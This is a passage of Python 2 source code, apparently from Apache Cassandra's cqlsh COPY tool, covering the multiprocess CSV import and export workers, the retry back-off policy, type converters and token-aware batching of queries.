for i, _ in enumerate(self.processes):
if self.processes[i].is_alive():
self.outmsg.channels[i].send(None)
# allow time for worker processes to exit cleanly
attempts = 50 # 100 milliseconds per attempt, so 5 seconds total
while attempts > 0 and self.num_live_processes() > 0:
time.sleep(0.1)
attempts -= 1
self.printmsg("\n%d rows imported from %d files in %s (%d skipped)." %
(self.receive_meter.get_total_records(),
self.feeding_result.num_sources if self.feeding_result else 0,
self.describe_interval(time.time() - self.time_start),
self.feeding_result.skip_rows if self.feeding_result else 0))
def all_processes_running(self):
return self.num_live_processes() == len(self.processes)
def receive_results(self):
"""
Receive results from the worker processes, which will send the number of rows imported
or from the feeder process, which will send the number of rows sent when it has finished sending rows.
"""
aggregate_result = ImportProcessResult()
try:
for result in self.inmsg.recv(timeout=0.1):
if isinstance(result, ImportProcessResult):
aggregate_result.imported += result.imported
elif isinstance(result, ImportTaskError):
self.error_handler.handle_error(result)
elif isinstance(result, FeedingProcessResult):
self.feeding_result = result
else:
raise ValueError("Unexpected result: %s" % (result,))
finally:
self.receive_meter.increment(aggregate_result.imported)
class FeedingProcess(mp.Process):
"""
A process that reads from import sources and sends chunks to worker processes.
"""
def __init__(self, inpipe, outpipe, worker_pipes, fname, options, parent_cluster):
mp.Process.__init__(self, target=self.run)
self.inpipe = inpipe
self.outpipe = outpipe
self.worker_pipes = worker_pipes
self.inmsg = None # must be created after forking on Windows
self.outmsg = None # must be created after forking on Windows
self.worker_channels = None # must be created after forking on Windows
self.reader = FilesReader(fname, options) if fname else PipeReader(inpipe, options)
self.send_meter = RateMeter(log_fcn=None, update_interval=1)
self.ingest_rate = options.copy['ingestrate']
self.num_worker_processes = options.copy['numprocesses']
self.chunk_id = 0
self.parent_cluster = parent_cluster
def on_fork(self):
"""
Create the channels and release any parent connections after forking,
see CASSANDRA-11749 for details.
"""
self.inmsg = ReceivingChannel(self.inpipe)
self.outmsg = SendingChannel(self.outpipe)
self.worker_channels = [SendingChannel(p) for p in self.worker_pipes]
if self.parent_cluster:
printdebugmsg("Closing parent cluster sockets")
self.parent_cluster.shutdown()
def run(self):
pr = profile_on() if PROFILE_ON else None
self.inner_run()
if pr:
profile_off(pr, file_name='feeder_profile_%d.txt' % (os.getpid(),))
def inner_run(self):
"""
Send one batch per worker process to the queue unless we have exceeded the ingest rate.
In the export case we queue everything and let the worker processes throttle using max_requests,
here we throttle using the ingest rate in the feeding process because of memory usage concerns.
When finished we send back to the parent process the total number of rows sent.
"""
self.on_fork()
reader = self.reader
reader.start()
channels = self.worker_channels
sent = 0
while not reader.exhausted:
for ch in channels:
try:
max_rows = self.ingest_rate - self.send_meter.current_record
if max_rows <= 0:
self.send_meter.maybe_update(sleep=False)
continue
rows = reader.read_rows(max_rows)
if rows:
sent += self.send_chunk(ch, rows)
except Exception, exc:
self.outmsg.send(ImportTaskError(exc.__class__.__name__, exc.message))
if reader.exhausted:
break
# send back to the parent process the number of rows sent to the worker processes
self.outmsg.send(FeedingProcessResult(sent, reader))
# wait for poison pill (None)
self.inmsg.recv()
def send_chunk(self, ch, rows):
self.chunk_id += 1
num_rows = len(rows)
self.send_meter.increment(num_rows)
ch.send({'id': self.chunk_id, 'rows': rows, 'imported': 0, 'num_rows_sent': num_rows})
return num_rows
def close(self):
self.reader.close()
self.inmsg.close()
self.outmsg.close()
for ch in self.worker_channels:
ch.close()
class ChildProcess(mp.Process):
"""
An child worker process, this is for common functionality between ImportProcess and ExportProcess.
"""
def __init__(self, params, target):
mp.Process.__init__(self, target=target)
self.inpipe = params['inpipe']
self.outpipe = params['outpipe']
self.inmsg = None # must be initialized after fork on Windows
self.outmsg = None # must be initialized after fork on Windows
self.ks = params['ks']
self.table = params['table']
self.local_dc = params['local_dc']
self.columns = params['columns']
self.debug = params['debug']
self.port = params['port']
self.hostname = params['hostname']
self.connect_timeout = params['connect_timeout']
self.cql_version = params['cql_version']
self.auth_provider = params['auth_provider']
self.parent_cluster = params['parent_cluster']
self.ssl = params['ssl']
self.protocol_version = params['protocol_version']
self.config_file = params['config_file']
options = params['options']
self.date_time_format = options.copy['dtformats']
self.consistency_level = options.copy['consistencylevel']
self.decimal_sep = options.copy['decimalsep']
self.thousands_sep = options.copy['thousandssep']
self.boolean_styles = options.copy['boolstyle']
self.max_attempts = options.copy['maxattempts']
self.encoding = options.copy['encoding']
# Here we inject some failures for testing purposes, only if this environment variable is set
if os.environ.get('CQLSH_COPY_TEST_FAILURES', ''):
self.test_failures = json.loads(os.environ.get('CQLSH_COPY_TEST_FAILURES', ''))
else:
self.test_failures = None
def on_fork(self):
"""
Create the channels and release any parent connections after forking, see CASSANDRA-11749 for details.
"""
self.inmsg = ReceivingChannel(self.inpipe)
self.outmsg = SendingChannel(self.outpipe)
if self.parent_cluster:
printdebugmsg("Closing parent cluster sockets")
self.parent_cluster.shutdown()
def close(self):
printdebugmsg("Closing queues...")
self.inmsg.close()
self.outmsg.close()
class ExpBackoffRetryPolicy(RetryPolicy):
"""
A retry policy with exponential back-off for read timeouts and write timeouts
"""
def __init__(self, parent_process):
RetryPolicy.__init__(self)
self.max_attempts = parent_process.max_attempts
def on_read_timeout(self, query, consistency, required_responses,
received_responses, data_retrieved, retry_num):
return self._handle_timeout(consistency, retry_num)
def on_write_timeout(self, query, consistency, write_type,
required_responses, received_responses, retry_num):
return self._handle_timeout(consistency, retry_num)
def _handle_timeout(self, consistency, retry_num):
delay = self.backoff(retry_num)
if delay > 0:
printdebugmsg("Timeout received, retrying after %d seconds" % (delay,))
time.sleep(delay)
return self.RETRY, consistency
elif delay == 0:
printdebugmsg("Timeout received, retrying immediately")
return self.RETRY, consistency
else:
printdebugmsg("Timeout received, giving up after %d attempts" % (retry_num + 1))
return self.RETHROW, None
def backoff(self, retry_num):
"""
Perform exponential back-off up to a maximum number of times, where
this maximum is per query.
To back-off we should wait a random number of seconds
between 0 and 2^c - 1, where c is the number of total failures.
randrange() excludes the last value, so we drop the -1.
:return : the number of seconds to wait for, -1 if we should not retry
"""
if retry_num >= self.max_attempts:
return -1
delay = randrange(0, pow(2, retry_num + 1))
return delay
class ExportSession(object):
"""
A class for connecting to a cluster and storing the number
of requests that this connection is processing. It wraps the methods
for executing a query asynchronously and for shutting down the
connection to the cluster.
"""
def __init__(self, cluster, export_process):
session = cluster.connect(export_process.ks)
session.row_factory = tuple_factory
session.default_fetch_size = export_process.options.copy['pagesize']
session.default_timeout = export_process.options.copy['pagetimeout']
printdebugmsg("Created connection to %s with page size %d and timeout %d seconds per page"
% (cluster.contact_points, session.default_fetch_size, session.default_timeout))
self.cluster = cluster
self.session = session
self.requests = 1
self.lock = threading.Lock()
self.consistency_level = export_process.consistency_level
def add_request(self):
with self.lock:
self.requests += 1
def complete_request(self):
with self.lock:
self.requests -= 1
def num_requests(self):
with self.lock:
return self.requests
def execute_async(self, query):
return self.session.execute_async(SimpleStatement(query, consistency_level=self.consistency_level))
def shutdown(self):
self.cluster.shutdown()
class ExportProcess(ChildProcess):
"""
An child worker process for the export task, ExportTask.
"""
def __init__(self, params):
ChildProcess.__init__(self, params=params, target=self.run)
options = params['options']
self.float_precision = options.copy['float_precision']
self.nullval = options.copy['nullval']
self.max_requests = options.copy['maxrequests']
self.hosts_to_sessions = dict()
self.formatters = dict()
self.options = options
def run(self):
try:
self.inner_run()
finally:
self.close()
def inner_run(self):
"""
The parent sends us (range, info) on the inbound queue (inmsg)
in order to request us to process a range, for which we can
select any of the hosts in info, which also contains other information for this
range such as the number of attempts already performed. We can signal errors
on the outbound queue (outmsg) by sending (range, error) or
we can signal a global error by sending (None, error).
We terminate when the inbound queue is closed.
"""
self.on_fork()
while True:
if self.num_requests() > self.max_requests:
time.sleep(0.001) # 1 millisecond
continue
token_range, info = self.inmsg.recv()
self.start_request(token_range, info)
@staticmethod
def get_error_message(err, print_traceback=False):
if isinstance(err, str):
msg = err
elif isinstance(err, BaseException):
msg = "%s - %s" % (err.__class__.__name__, err)
if print_traceback and sys.exc_info()[1] == err:
traceback.print_exc()
else:
msg = unicode(err)
return msg
def report_error(self, err, token_range):
msg = self.get_error_message(err, print_traceback=self.debug)
printdebugmsg(msg)
self.send((token_range, Exception(msg)))
def send(self, response):
self.outmsg.send(response)
def start_request(self, token_range, info):
"""
Begin querying a range by executing an async query that
will later on invoke the callbacks attached in attach_callbacks.
"""
session = self.get_session(info['hosts'], token_range)
if session:
metadata = session.cluster.metadata.keyspaces[self.ks].tables[self.table]
query = self.prepare_query(metadata.partition_key, token_range, info['attempts'])
future = session.execute_async(query)
self.attach_callbacks(token_range, future, session)
def num_requests(self):
return sum(session.num_requests() for session in self.hosts_to_sessions.values())
def get_session(self, hosts, token_range):
"""
We return a session connected to one of the hosts passed in, which are valid replicas for
the token range. We sort replicas by favouring those without any active requests yet or with the
smallest number of requests. If we fail to connect we report an error so that the token will
be retried again later.
:return: An ExportSession connected to the chosen host.
"""
# sorted replicas favouring those with no connections yet
hosts = sorted(hosts,
key=lambda hh: 0 if hh not in self.hosts_to_sessions else self.hosts_to_sessions[hh].requests)
errors = []
ret = None
for host in hosts:
try:
ret = self.connect(host)
except Exception, e:
errors.append(self.get_error_message(e))
if ret:
if errors:
printdebugmsg("Warning: failed to connect to some replicas: %s" % (errors,))
return ret
self.report_error("Failed to connect to all replicas %s for %s, errors: %s" % (hosts, token_range, errors),
token_range)
return None
def connect(self, host):
if host in self.hosts_to_sessions.keys():
session = self.hosts_to_sessions[host]
session.add_request()
return session
new_cluster = Cluster(
contact_points=(host,),
port=self.port,
cql_version=self.cql_version,
protocol_version=self.protocol_version,
auth_provider=self.auth_provider,
ssl_options=ssl_settings(host, self.config_file) if self.ssl else None,
load_balancing_policy=WhiteListRoundRobinPolicy([host]),
default_retry_policy=ExpBackoffRetryPolicy(self),
compression=None,
control_connection_timeout=self.connect_timeout,
connect_timeout=self.connect_timeout,
idle_heartbeat_interval=0)
session = ExportSession(new_cluster, self)
self.hosts_to_sessions[host] = session
return session
def attach_callbacks(self, token_range, future, session):
def result_callback(rows):
if future.has_more_pages:
future.start_fetching_next_page()
self.write_rows_to_csv(token_range, rows)
else:
self.write_rows_to_csv(token_range, rows)
self.send((None, None))
session.complete_request()
def err_callback(err):
self.report_error(err, token_range)
session.complete_request()
future.add_callbacks(callback=result_callback, errback=err_callback)
def write_rows_to_csv(self, token_range, rows):
if not rows:
return # no rows in this range
try:
output = StringIO()
writer = csv.writer(output, **self.options.dialect)
for row in rows:
writer.writerow(map(self.format_value, row))
data = (output.getvalue(), len(rows))
self.send((token_range, data))
output.close()
except Exception, e:
self.report_error(e, token_range)
def format_value(self, val):
if val is None or val == EMPTY:
return format_value_default(self.nullval, colormap=NO_COLOR_MAP)
ctype = type(val)
formatter = self.formatters.get(ctype, None)
if not formatter:
formatter = get_formatter(ctype)
self.formatters[ctype] = formatter
return formatter(val, encoding=self.encoding, colormap=NO_COLOR_MAP, date_time_format=self.date_time_format,
float_precision=self.float_precision, nullval=self.nullval, quote=False,
decimal_sep=self.decimal_sep, thousands_sep=self.thousands_sep,
boolean_styles=self.boolean_styles)
def close(self):
ChildProcess.close(self)
for session in self.hosts_to_sessions.values():
session.shutdown()
def prepare_query(self, partition_key, token_range, attempts):
"""
Return the export query or a fake query with some failure injected.
"""
if self.test_failures:
return self.maybe_inject_failures(partition_key, token_range, attempts)
else:
return self.prepare_export_query(partition_key, token_range)
def maybe_inject_failures(self, partition_key, token_range, attempts):
"""
Examine self.test_failures and see if token_range is either a token range
supposed to cause a failure (failing_range) or to terminate the worker process
(exit_range). If not then call prepare_export_query(), which implements the
normal behavior.
"""
start_token, end_token = token_range
if not start_token or not end_token:
# exclude first and last ranges to make things simpler
return self.prepare_export_query(partition_key, token_range)
if 'failing_range' in self.test_failures:
failing_range = self.test_failures['failing_range']
if start_token >= failing_range['start'] and end_token <= failing_range['end']:
if attempts < failing_range['num_failures']:
return 'SELECT * from bad_table'
if 'exit_range' in self.test_failures:
exit_range = self.test_failures['exit_range']
if start_token >= exit_range['start'] and end_token <= exit_range['end']:
sys.exit(1)
return self.prepare_export_query(partition_key, token_range)
def prepare_export_query(self, partition_key, token_range):
"""
Return a query where we select all the data for this token range
"""
pk_cols = ", ".join(protect_names(col.name for col in partition_key))
columnlist = ', '.join(protect_names(self.columns))
start_token, end_token = token_range
query = 'SELECT %s FROM %s.%s' % (columnlist, protect_name(self.ks), protect_name(self.table))
if start_token is not None or end_token is not None:
query += ' WHERE'
if start_token is not None:
query += ' token(%s) > %s' % (pk_cols, start_token)
if start_token is not None and end_token is not None:
query += ' AND'
if end_token is not None:
query += ' token(%s) <= %s' % (pk_cols, end_token)
return query
class ParseError(Exception):
""" We failed to parse an import record """
pass
class ImportConversion(object):
"""
A class for converting strings to values when importing from csv, used by ImportProcess,
the parent.
"""
def __init__(self, parent, table_meta, statement=None):
self.ks = parent.ks
self.table = parent.table
self.columns = parent.valid_columns
self.nullval = parent.nullval
self.decimal_sep = parent.decimal_sep
self.thousands_sep = parent.thousands_sep
self.boolean_styles = parent.boolean_styles
self.date_time_format = parent.date_time_format.timestamp_format
self.debug = parent.debug
self.encoding = parent.encoding
self.table_meta = table_meta
self.primary_key_indexes = [self.columns.index(col.name) for col in self.table_meta.primary_key]
self.partition_key_indexes = [self.columns.index(col.name) for col in self.table_meta.partition_key]
if statement is None:
self.use_prepared_statements = False
statement = self._get_primary_key_statement(parent, table_meta)
else:
self.use_prepared_statements = True
self.is_counter = parent.is_counter(table_meta)
self.proto_version = statement.protocol_version
# the cql types and converters for the prepared statement, either the full statement or only the primary keys
self.cqltypes = [c.type for c in statement.column_metadata]
self.converters = [self._get_converter(c.type) for c in statement.column_metadata]
# the cql types for the entire statement, these are the same as the types above but
# only when using prepared statements
self.coltypes = [table_meta.columns[name].cql_type for name in parent.valid_columns]
# these functions are used for non-prepared statements to protect values with quotes if required
self.protectors = [self._get_protector(t) for t in self.coltypes]
@staticmethod
def _get_protector(t):
if t in ('ascii', 'text', 'timestamp', 'date', 'time', 'inet'):
return lambda v: protect_value(v)
else:
return lambda v: v
@staticmethod
def _get_primary_key_statement(parent, table_meta):
"""
We prepare a query statement to find out the types of the partition key columns so we can
route the update query to the correct replicas. As far as I understood this is the easiest
way to find out the types of the partition columns, we will never use this prepared statement
"""
where_clause = ' AND '.join(['%s = ?' % (protect_name(c.name)) for c in table_meta.partition_key])
select_query = 'SELECT * FROM %s.%s WHERE %s' % (protect_name(parent.ks),
protect_name(parent.table),
where_clause)
return parent.session.prepare(select_query)
@staticmethod
def unprotect(v):
if v is not None:
return CqlRuleSet.dequote_value(v)
def _get_converter(self, cql_type):
"""
Return a function that converts a string into a value the can be passed
into BoundStatement.bind() for the given cql type. See cassandra.cqltypes
for more details.
"""
unprotect = self.unprotect
def convert(t, v):
v = unprotect(v)
if v == self.nullval:
return self.get_null_val()
return converters.get(t.typename, convert_unknown)(v, ct=t)
def convert_mandatory(t, v):
v = unprotect(v)
if v == self.nullval:
raise ParseError('Empty values are not allowed')
return converters.get(t.typename, convert_unknown)(v, ct=t)
def convert_blob(v, **_):
return bytearray.fromhex(v[2:])
def convert_text(v, **_):
return v
def convert_uuid(v, **_):
return UUID(v)
def convert_bool(v, **_):
return True if v.lower() == self.boolean_styles[0].lower() else False
def get_convert_integer_fcn(adapter=int):
"""
Return a slow and a fast integer conversion function depending on self.thousands_sep
"""
if self.thousands_sep:
return lambda v, ct=cql_type: adapter(v.replace(self.thousands_sep, ''))
else:
return lambda v, ct=cql_type: adapter(v)
def get_convert_decimal_fcn(adapter=float):
"""
Return a slow and a fast decimal conversion function depending on self.thousands_sep and self.decimal_sep
"""
if self.thousands_sep and self.decimal_sep:
return lambda v, ct=cql_type: adapter(v.replace(self.thousands_sep, '').replace(self.decimal_sep, '.'))
elif self.thousands_sep:
return lambda v, ct=cql_type: adapter(v.replace(self.thousands_sep, ''))
elif self.decimal_sep:
return lambda v, ct=cql_type: adapter(v.replace(self.decimal_sep, '.'))
else:
return lambda v, ct=cql_type: adapter(v)
def split(val, sep=','):
"""
Split into a list of values whenever we encounter a separator but
ignore separators inside parentheses or single quotes, except for the two
outermost parentheses, which will be ignored. We expect val to be at least
2 characters long (the two outer parentheses).
"""
ret = []
last = 1
level = 0
quote = False
for i, c in enumerate(val):
if c == '\'':
quote = not quote
elif not quote:
if c == '{' or c == '[' or c == '(':
level += 1
elif c == '}' or c == ']' or c == ')':
level -= 1
elif c == sep and level == 1:
ret.append(val[last:i])
last = i + 1
else:
if last < len(val) - 1:
ret.append(val[last:-1])
return ret
# this should match all possible CQL datetime formats
p = re.compile("(\d{4})\-(\d{2})\-(\d{2})\s?(?:'T')?" + # YYYY-MM-DD[( |'T')]
"(?:(\d{2}):(\d{2})(?::(\d{2}))?)?" + # [HH:MM[:SS]]
"(?:([+\-])(\d{2}):?(\d{2}))?") # [(+|-)HH[:]MM]]
def convert_datetime(val, **_):
try:
tval = time.strptime(val, self.date_time_format)
return timegm(tval) * 1e3 # scale seconds to millis for the raw value
except ValueError:
pass # if it's not in the default format we try CQL formats
m = p.match(val)
if not m:
raise ValueError("can't interpret %r as a date with this format: %s" % (val, self.date_time_format))
# https://docs.python.org/2/library/time.html#time.struct_time
tval = time.struct_time((int(m.group(1)), int(m.group(2)), int(m.group(3)), # year, month, day
int(m.group(4)) if m.group(4) else 0, # hour
int(m.group(5)) if m.group(5) else 0, # minute
int(m.group(6)) if m.group(6) else 0, # second
0, 1, -1)) # day of week, day of year, dst-flag
if m.group(7):
offset = (int(m.group(8)) * 3600 + int(m.group(9)) * 60) * int(m.group(7) + '1')
else:
offset = -time.timezone
# scale seconds to millis for the raw value
return (timegm(tval) + offset) * 1e3
def convert_date(v, **_):
return Date(v)
def convert_time(v, **_):
return Time(v)
def convert_tuple(val, ct=cql_type):
return tuple(convert_mandatory(t, v) for t, v in zip(ct.subtypes, split(val)))
def convert_list(val, ct=cql_type):
return tuple(convert_mandatory(ct.subtypes[0], v) for v in split(val))
def convert_set(val, ct=cql_type):
return frozenset(convert_mandatory(ct.subtypes[0], v) for v in split(val))
def convert_map(val, ct=cql_type):
"""
We need to pass to BoundStatement.bind() a dict() because it calls iteritems(),
except we can't create a dict with another dict as the key, hence we use a class
that adds iteritems to a frozen set of tuples (which is how dict are normally made
immutable in python).
"""
class ImmutableDict(frozenset):
iteritems = frozenset.__iter__
return ImmutableDict(frozenset((convert_mandatory(ct.subtypes[0], v[0]), convert(ct.subtypes[1], v[1]))
for v in [split('{%s}' % vv, sep=':') for vv in split(val)]))
def convert_user_type(val, ct=cql_type):
"""
A user type is a dictionary except that we must convert each key into
an attribute, so we are using named tuples. It must also be hashable,
so we cannot use dictionaries. Maybe there is a way to instantiate ct
directly but I could not work it out.
Also note that it is possible that the subfield names in the csv are in the
wrong order, so we must sort them according to ct.fieldnames, see CASSANDRA-12959.
"""
vals = [v for v in [split('{%s}' % vv, sep=':') for vv in split(val)]]
dict_vals = dict((unprotect(v[0]), v[1]) for v in vals)
sorted_converted_vals = [(n, convert(t, dict_vals[n]) if n in dict_vals else self.get_null_val())
for n, t in zip(ct.fieldnames, ct.subtypes)]
ret_type = namedtuple(ct.typename, [v[0] for v in sorted_converted_vals])
return ret_type(*tuple(v[1] for v in sorted_converted_vals))
def convert_single_subtype(val, ct=cql_type):
return converters.get(ct.subtypes[0].typename, convert_unknown)(val, ct=ct.subtypes[0])
def convert_unknown(val, ct=cql_type):
if issubclass(ct, UserType):
return convert_user_type(val, ct=ct)
elif issubclass(ct, ReversedType):
return convert_single_subtype(val, ct=ct)
printdebugmsg("Unknown type %s (%s) for val %s" % (ct, ct.typename, val))
return val
converters = {
'blob': convert_blob,
'decimal': get_convert_decimal_fcn(adapter=Decimal),
'uuid': convert_uuid,
'boolean': convert_bool,
'tinyint': get_convert_integer_fcn(),
'ascii': convert_text,
'float': get_convert_decimal_fcn(),
'double': get_convert_decimal_fcn(),
'bigint': get_convert_integer_fcn(adapter=long),
'int': get_convert_integer_fcn(),
'varint': get_convert_integer_fcn(),
'inet': convert_text,
'counter': get_convert_integer_fcn(adapter=long),
'timestamp': convert_datetime,
'timeuuid': convert_uuid,
'date': convert_date,
'smallint': get_convert_integer_fcn(),
'time': convert_time,
'text': convert_text,
'varchar': convert_text,
'list': convert_list,
'set': convert_set,
'map': convert_map,
'tuple': convert_tuple,
'frozen': convert_single_subtype,
}
return converters.get(cql_type.typename, convert_unknown)
def get_null_val(self):
"""
Return the null value that is inserted for fields that are missing from csv files.
For counters we should return zero so that the counter value won't be incremented.
For everything else we return nulls, this means None if we use prepared statements
or "NULL" otherwise. Note that for counters we never use prepared statements, so we
only check is_counter when use_prepared_statements is false.
"""
return None if self.use_prepared_statements else ("0" if self.is_counter else "NULL")
def convert_row(self, row):
"""
Convert the row into a list of parsed values if using prepared statements, else simply apply the
protection functions to escape values with quotes when required. Also check on the row length and
make sure primary partition key values aren't missing.
"""
converters = self.converters if self.use_prepared_statements else self.protectors
if len(row) != len(converters):
raise ParseError('Invalid row length %d should be %d' % (len(row), len(converters)))
for i in self.primary_key_indexes:
if row[i] == self.nullval:
raise ParseError(self.get_null_primary_key_message(i))
def convert(c, v):
try:
return c(v) if v != self.nullval else self.get_null_val()
except Exception, e:
if self.debug:
traceback.print_exc()
raise ParseError("Failed to parse %s : %s" % (val, e.message))
return [convert(conv, val) for conv, val in zip(converters, row)]
def get_null_primary_key_message(self, idx):
message = "Cannot insert null value for primary key column '%s'." % (self.columns[idx],)
if self.nullval == '':
message += " If you want to insert empty strings, consider using" \
" the WITH NULL=<marker> option for COPY."
return message
def get_row_partition_key_values_fcn(self):
"""
Return a function to convert a row into a string composed of the partition key values serialized
and binary packed (the tokens on the ring). Depending on whether we are using prepared statements, we
may have to convert the primary key values first, so we have two different serialize_value implementations.
We also return different functions depending on how many partition key indexes we have (single or multiple).
See also BoundStatement.routing_key.
"""
def serialize_value_prepared(n, v):
return self.cqltypes[n].serialize(v, self.proto_version)
def serialize_value_not_prepared(n, v):
return self.cqltypes[n].serialize(self.converters[n](self.unprotect(v)), self.proto_version)
partition_key_indexes = self.partition_key_indexes
serialize = serialize_value_prepared if self.use_prepared_statements else serialize_value_not_prepared
def serialize_row_single(row):
return serialize(partition_key_indexes[0], row[partition_key_indexes[0]])
def serialize_row_multiple(row):
pk_values = []
for i in partition_key_indexes:
val = serialize(i, row[i])
length = len(val)
pk_values.append(struct.pack(">H%dsB" % length, length, val, 0))
return b"".join(pk_values)
if len(partition_key_indexes) == 1:
return serialize_row_single
return serialize_row_multiple
class TokenMap(object):
"""
A wrapper around the metadata token map to speed things up by caching ring token *values* and
replicas. It is very important that we use the token values, which are primitive types, rather
than the tokens classes when calling bisect_right() in split_batches(). If we use primitive values,
the bisect is done in compiled code whilst with token classes each comparison requires a call
into the interpreter to perform the cmp operation defined in Python. A simple test with 1 million bisect
operations on an array of 2048 tokens was done in 0.37 seconds with primitives and 2.25 seconds with
token classes. This is significant for large datasets because we need to do a bisect for each single row,
and if VNODES are used, the size of the token map can get quite large too.
"""
def __init__(self, ks, hostname, local_dc, session):
self.ks = ks
self.hostname = hostname
self.local_dc = local_dc
self.metadata = session.cluster.metadata
self._initialize_ring()
# Note that refresh metadata is disabled by default and we currenlty do not intercept it
# If hosts are added, removed or moved during a COPY operation our token map is no longer optimal
# However we can cope with hosts going down and up since we filter for replicas that are up when
# making each batch
def _initialize_ring(self):
token_map = self.metadata.token_map
if token_map is None:
self.ring = [0]
self.replicas = [(self.metadata.get_host(self.hostname),)]
self.pk_to_token_value = lambda pk: 0
return
token_map.rebuild_keyspace(self.ks, build_if_absent=True)
tokens_to_hosts = token_map.tokens_to_hosts_by_ks.get(self.ks, None)
from_key = token_map.token_class.from_key
self.ring = [token.value for token in token_map.ring]
self.replicas = [tuple(tokens_to_hosts[token]) for token in token_map.ring]
self.pk_to_token_value = lambda pk: from_key(pk).value
@staticmethod
def get_ring_pos(ring, val):
idx = bisect_right(ring, val)
return idx if idx < len(ring) else 0
def filter_replicas(self, hosts):
shuffled = tuple(sorted(hosts, key=lambda k: random.random()))
return filter(lambda r: r.is_up is not False and r.datacenter == self.local_dc, shuffled) if hosts else ()
class FastTokenAwarePolicy(DCAwareRoundRobinPolicy):
"""
Send to any replicas attached to the query, or else fall back to DCAwareRoundRobinPolicy
"""
def __init__(self, local_dc='', used_hosts_per_remote_dc=0):
DCAwareRoundRobinPolicy.__init__(self, local_dc, used_hosts_per_remote_dc)
def make_query_plan(self, working_keyspace=None, query=None):
"""
Extend TokenAwarePolicy.make_query_plan() so that we choose the same replicas in preference
and most importantly we avoid repeating the (slow) bisect
"""
replicas = query.replicas if hasattr(query, 'replicas') else []
for r in replicas:
yield r
for r in DCAwareRoundRobinPolicy.make_query_plan(self, working_keyspace, query):
if r not in replicas:
yield r
class ImportProcess(ChildProcess):
def __init__(self, params):
ChildProcess.__init__(self, params=params, target=self.run)
self.skip_columns = params['skip_columns']
self.valid_columns = [c.encode(self.encoding) for c in params['valid_columns']]
self.skip_column_indexes = [i for i, c in enumerate(self.columns) if c in self.skip_columns]
options = params['options']
self.nullval = options.copy['nullval']
self.max_attempts = options.copy['maxattempts']
self.min_batch_size = options.copy['minbatchsize']
self.max_batch_size = options.copy['maxbatchsize']
self.use_prepared_statements = options.copy['preparedstatements']
self.dialect_options = options.dialect
self._session = None
self.query = None
self.conv = None
self.make_statement = None
@property
def session(self):
if not self._session:
cluster = Cluster(
contact_points=(self.hostname,),
port=self.port,
cql_version=self.cql_version,
protocol_version=self.protocol_version,
auth_provider=self.auth_provider,
load_balancing_policy=FastTokenAwarePolicy(local_dc=self.local_dc),
ssl_options=ssl_settings(self.hostname, self.config_file) if self.ssl else None,
default_retry_policy=ExpBackoffRetryPolicy(self),
compression=None,
control_connection_timeout=self.connect_timeout,
connect_timeout=self.connect_timeout,
idle_heartbeat_interval=0)
self._session = cluster.connect(self.ks)
self._session.default_timeout = None
return self._session
def run(self):
try:
pr = profile_on() if PROFILE_ON else None
self.on_fork()
self.inner_run(*self.make_params())
if pr:
profile_off(pr, file_name='worker_profile_%d.txt' % (os.getpid(),))
except Exception, exc:
self.report_error(exc)
finally:
self.close()
def close(self):
if self._session:
self._session.cluster.shutdown()
ChildProcess.close(self)
def is_counter(self, table_meta):
return "counter" in [table_meta.columns[name].cql_type for name in self.valid_columns]
def make_params(self):
metadata = self.session.cluster.metadata
table_meta = metadata.keyspaces[self.ks].tables[self.table]
prepared_statement = None
if self.is_counter(table_meta):
query = 'UPDATE %s.%s SET %%s WHERE %%s' % (protect_name(self.ks), protect_name(self.table))
make_statement = self.wrap_make_statement(self.make_counter_batch_statement)
elif self.use_prepared_statements:
query = 'INSERT INTO %s.%s (%s) VALUES (%s)' % (protect_name(self.ks),
protect_name(self.table),
', '.join(protect_names(self.valid_columns),),
', '.join(['?' for _ in self.valid_columns]))
query = self.session.prepare(query)
query.consistency_level = self.consistency_level
prepared_statement = query
make_statement = self.wrap_make_statement(self.make_prepared_batch_statement)
else:
query = 'INSERT INTO %s.%s (%s) VALUES (%%s)' % (protect_name(self.ks),
protect_name(self.table),
', '.join(protect_names(self.valid_columns),))
make_statement = self.wrap_make_statement(self.make_non_prepared_batch_statement)
conv = ImportConversion(self, table_meta, prepared_statement)
tm = TokenMap(self.ks, self.hostname, self.local_dc, self.session)
return query, conv, tm, make_statement
def inner_run(self, query, conv, tm, make_statement):
"""
Main run method. Note that we bind self methods that are called inside loops
for performance reasons.
"""
self.query = query
self.conv = conv
self.make_statement = make_statement
convert_rows = self.convert_rows
split_into_batches = self.split_into_batches
result_callback = self.result_callback
err_callback = self.err_callback
session = self.session
while True:
chunk = self.inmsg.recv()
if chunk is None:
break
try:
chunk['rows'] = convert_rows(conv, chunk)
for replicas, batch in split_into_batches(chunk, conv, tm):
statement = make_statement(query, conv, chunk, batch, replicas)
if statement:
future = session.execute_async(statement)
future.add_callbacks(callback=result_callback, callback_args=(batch, chunk),
errback=err_callback, errback_args=(batch, chunk, replicas))
except Exception, exc:
self.report_error(exc, chunk, chunk['rows'])
def wrap_make_statement(self, inner_make_statement):
def make_statement(query, conv, chunk, batch, replicas):
try:
return inner_make_statement(query, conv, batch, replicas)
except Exception, exc:
print "Failed to make batch statement: {}".format(exc)
self.report_error(exc, chunk, batch['rows'])
return None
def make_statement_with_failures(query, conv, chunk, batch, replicas):
failed_batch = self.maybe_inject_failures(batch)
if failed_batch:
return failed_batch
return make_statement(query, conv, chunk, batch, replicas)
return make_statement_with_failures if self.test_failures else make_statement
def make_counter_batch_statement(self, query, conv, batch, replicas):
def make_full_query(r):
where_clause = []
set_clause = []
for i, value in enumerate(r):
if i in conv.primary_key_indexes:
where_clause.append("%s=%s" % (self.valid_columns[i], value))
else:
set_clause.append("%s=%s+%s" % (self.valid_columns[i], self.valid_columns[i], value))
return query % (','.join(set_clause), ' AND '.join(where_clause))
if len(batch['rows']) == 1:
statement = SimpleStatement(make_full_query(batch['rows'][0]), consistency_level=self.consistency_level)
else:
statement = BatchStatement(batch_type=BatchType.COUNTER, consistency_level=self.consistency_level)
for row in batch['rows']:
statement.add(make_full_query(row))
statement.replicas = replicas
statement.keyspace = self.ks
return statement
def make_prepared_batch_statement(self, query, _, batch, replicas):
"""
Return a batch statement. This is an optimized version of:
statement = BatchStatement(batch_type=BatchType.UNLOGGED, consistency_level=self.consistency_level)
for row in batch['rows']:
statement.add(query, row)
We could optimize further by removing bound_statements altogether but we'd have to duplicate much
more driver's code (BoundStatement.bind()).
"""
if len(batch['rows']) == 1:
statement = query.bind(batch['rows'][0])
else:
statement = BatchStatement(batch_type=BatchType.UNLOGGED, consistency_level=self.consistency_level)
statement._statements_and_parameters = [(True, query.query_id, query.bind(r).values) for r in batch['rows']]
statement.replicas = replicas
